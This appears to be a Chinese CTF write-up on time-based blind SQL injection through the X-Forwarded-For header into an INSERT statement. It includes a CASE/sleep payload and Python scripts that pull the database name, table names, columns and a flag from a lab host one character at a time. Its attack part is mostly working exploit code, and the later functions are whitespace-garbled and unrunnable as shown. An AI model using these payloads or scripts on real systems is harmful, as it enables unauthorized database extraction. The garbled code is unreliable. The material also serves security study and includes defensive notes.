用法:CASE value WHEN [compare_value] THEN result [WHEN [compare_value] THEN result ...] [ELSE result] END,比如:我现在使用的库是test:
可以看到实现了与if()相同的效果。接下来我们先在bp里实验一下。
实验
直接在bp截包,修改XFF信息:
发现没有任何报错,只能换方法了:改用时间盲注试试。我们构造:'+(select case when (substring((select database()) from 1 for 1)='?') then sleep(5) else 1 end) and '1'='1,这样原句就会变成:insert into client_ip (ip) values (''+(select case when (substring((select database()) from 1 for 1)='?') then sleep(5) else 1 end) and '1'='1')。
# Time-based blind injection harness for the experiment described above: the
# X-Forwarded-For header is concatenated, unparameterised, into
# `insert into client_ip (ip) values ('...')` (see the write-up), so a CASE
# expression that calls sleep(5) on a correct guess turns every character of
# the database name into a request that either returns promptly or runs into
# the 4 s client-side timeout.
# Defensive notes: X-Forwarded-For is attacker-controlled and must be treated
# like any other untrusted input (parameterised statements, never string
# concatenation). The technique is also easy to spot in access logs: a burst
# of near-identical requests to one URL, differing only by one character of
# the header, with occasional ~4-5 s responses.
# Assumes `string` and `requests` are imported earlier in the file (not shown).
characters = string.ascii_letters + string.digits  # guess alphabet
max_length = 50  # upper bound on the number of positions probed
target = 'http://123.206.87.240:8002/web15/'  # lab target from the write-up


def get_database():
    """Recover the current database name one character at a time.

    For each position i (1..max_length-1) every candidate character is tried;
    a ReadTimeout from `requests.get` is taken to mean the sleep branch fired,
    i.e. the guess was right. Returns the recovered string as soon as a
    position yields no timeout for any candidate; falls off the end (implicit
    None) if every position up to max_length-1 matched.
    """
    flag = ''
    for i in range(1, max_length):
        next_position = False
        for char in characters:
            payload = "'+(select case when (substring((select database() ) from %s for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(i,char)
            headers = { 'X-Forwarded-For': payload }
            try:
                # The response body is never read; only the timeout carries information.
                r = requests.get(target,headers=headers,timeout=4)
            except requests.exceptions.ReadTimeout:
                flag += char
                print(flag)
                next_position = True
                break
        if not next_position:
            return flag
# Second, more general version of the harness: the SQL template is
# parameterised on position ({0}) and candidate character ({1}), and the
# guess alphabet is widened with punctuation.
# Assumes `string` and `requests` are imported earlier in the file (not shown).
characters = string.ascii_letters + string.digits + string.punctuation
max_length = 50  # upper bound on the number of positions probed
target = 'http://123.206.87.240:8002/web15/'  # lab target from the write-up
# Template that tests one character of the current database name; a correct
# guess makes the server sleep(4), which the client observes as a ReadTimeout.
cur_database = "'+(select case when (substring((select database() ) from {0} for 1)='{1}') " \
               "then sleep(4) else 1 end) and '1'='1"
# Guess characters one at a time.
def get(payload):
    """Run one blind-extraction loop for *payload*, a template with {0}/{1} slots.

    Every character in `characters` is tried at each position; a ReadTimeout
    from the request means the injected CASE reached its sleep branch, i.e.
    the guess was right. Returns the recovered string once a position yields
    no timeout for any candidate; falls off the end (implicit None) if all
    positions up to max_length-1 matched.
    """
    flag = ''
    for i in range(1, max_length):  # i is the maximum length of the name being searched for
        next_position = False
        for char in characters:  # 0x80=128, 0x20=32; 32-128 is the printable-character range
            payload_ = payload.format(str(i), char)
            headers = { 'X-Forwarded-For': payload_ }
            try:
                # The response body is never read; only the timeout carries information.
                r = requests.get(target,headers=headers,timeout=4)
            except requests.exceptions.ReadTimeout:
                flag += char
                print(flag)
                next_position = True
                break
        if not next_position:
            return flag
# 指定数据库,获取其下全部表名 defget_table(database): for i inrange(0,5): print("正在查询数据库" + database + "中的表") payload = "'+(select case when (substring((" \ "select table_name from information_schema.tables where table_schema='"+ database + "' limit 1 offset "+ str(i) +") " \ "from {0} for 1)='{1}') " \ "then sleep(4) else 1 end) and '1'='1" table = get(payload) print( "数据库" + database + "的第"+ str(i+1) +"个表"+table) get_col(table)
# 查字段 defget_col(table): for i inrange(0,5): print("正在查询表" + table + "中的字段") payload = "'+(select case when (substring((" \ "select column_name from information_schema.columns where table_name='"+ table +"' limit 1 offset "+ str(i) +") " \ "from {0} for 1)='{1}') " \ "then sleep(4) else 1 end) and '1'='1" column = get(payload) print("表" + table + "的第" + str(i+1) + "个字段为" + column ) # print(column) ifnot column: print("表" + table + "中的字段查询完毕") break
# 作为单独的模块使用吧,获取字段详细信息 defresult(column,table): payload = "'+(select case when (substring((select "+column+" from "+table+") from {0} for 1)='{1}') " \ "then sleep(4) else 1 end) and '1'='1" print(get(payload)) a = 'flag' result(a,a)
if __name__ == "__main__":
    # Entry point: recover the database name, then enumerate its tables (and,
    # via get_table -> get_col, their columns). get_table returns None, so
    # table1 is always None.
    database1 = get(cur_database)
    table1 = get_table(database1)